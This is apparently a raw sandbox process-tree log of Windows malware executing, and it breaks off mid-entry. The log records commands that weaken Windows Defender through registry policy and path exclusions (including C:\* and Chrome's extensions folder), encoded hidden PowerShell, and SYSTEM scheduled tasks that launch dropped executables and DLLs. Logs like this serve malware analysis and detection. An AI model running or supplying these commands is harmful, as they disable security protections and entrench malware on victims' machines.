C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\CyZXKNy.exe 3Y /SVsite_idajF 385121 /S
1⤵
PID:8488
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:984
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4476
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:7296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6224
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    - Executes dropped EXE
    PID:920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6496
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6348
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:4524
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6964
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:7680
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6048
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7356
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6148
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5820
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5448
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:9072
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ghGaHBRTr" /SC once /ST 02:02:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:7680
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "ghGaHBRTr"
  2⤵
  PID:5252
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ghGaHBRTr"
  2⤵
  PID:308
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 05:31:28 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\ejKDTdh.exe\" KS /nOsite_idIDl 385121 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:1856
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"
  2⤵
  PID:6928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
1⤵
PID:4160

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
PID:5440

C:\Users\Admin\AppData\Roaming\CustomAttributeType\AreAccessRulesProtected.exe
C:\Users\Admin\AppData\Roaming\CustomAttributeType\AreAccessRulesProtected.exe
1⤵
PID:1012

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5632

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:3324

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1⤵
PID:8640

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\ejKDTdh.exe
C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\ejKDTdh.exe KS /nOsite_idIDl 385121 /S
1⤵
PID:3256
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"
  2⤵
  PID:5396
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:5076
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:1348
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:8520
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:4696
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\SSgArO.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:7580
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\vEmMMKv.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:9656
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ztlTbPYifermRZH"
  2⤵
  PID:9740
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ztlTbPYifermRZH"
  2⤵
  PID:9860
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "lYRFoiYPtWPCfC" /F /xml "C:\Program Files (x86)\DlbZONUGhjVU2\kmCHbED.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:9984
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "TrprvximDXTQo2" /F /xml "C:\ProgramData\nBRnpywzcTvqknVB\uZjgtGr.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:10084
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "NtSpqNxSmBAhIMqiB2" /F /xml "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\kITXxtl.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:10192
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gFXJCgZLnIrdqQxYYQs2" /F /xml "C:\Program Files (x86)\KrPQunXfXpAVC\JujwgMe.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:348
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "HKFMMLmWpeGdwIqGl" /SC once /ST 01:35:02 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\ffUAlJKd\LhvveWP.dll\",#1 /Odsite_idhMb 385121" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:9384
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "HKFMMLmWpeGdwIqGl"
  2⤵
  PID:9572
- C:\Windows\SysWOW64\cmd.exe
